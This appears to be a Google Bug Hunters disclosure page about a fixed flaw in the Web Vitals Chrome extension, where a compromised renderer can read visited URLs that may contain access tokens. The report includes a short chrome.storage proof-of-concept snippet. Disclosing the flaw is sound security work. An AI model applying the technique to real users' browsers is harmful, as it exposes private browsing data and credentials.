Skip to Content (Press Enter)
Google
Bug Hunters
URLs leak in Web Vitals
Reported by:
NDevTK
Google VRP
triaged
16:56 | Jun 19, 2023
accepted
21:11 | Jun 23, 2023
triaged
15:30 | Jul 4, 2023
accepted
19:01 | Jul 4, 2023
fixed
11:04 | Aug 31, 2023
Summary:
URLs leak in Web Vitals
Product:
Web Vitals
URL:
https://chrome.google.com/webstore/detail/web-vitals/ahfhijdlegdabablpippeagghigmibma?hl=en
Vulnerability type:
Sensitive data exposure
Details
In the context of the content script on an attacker controlled website.
chrome.storage.local.get(null, results => {
for (let hash in results) {
 console.log(results[hash].location);
}
});
Attack scenario
A compromised renderer can leak visited URLs this maybe sensitive for example the url may contain an access_token
Git repo:
https://github.com/GoogleChrome/web-vitals-extension/tree/master
While I may be wrong this does look to be a Google extension.
https://github.com/GoogleChrome/web-vitals-extension/blob/master/CONTRIBUTING.md
Done as part of Grant issue 286169438
https://web.dev/debug-cwvs-with-web-vitals-extension/
登录
使用 Google 账号登录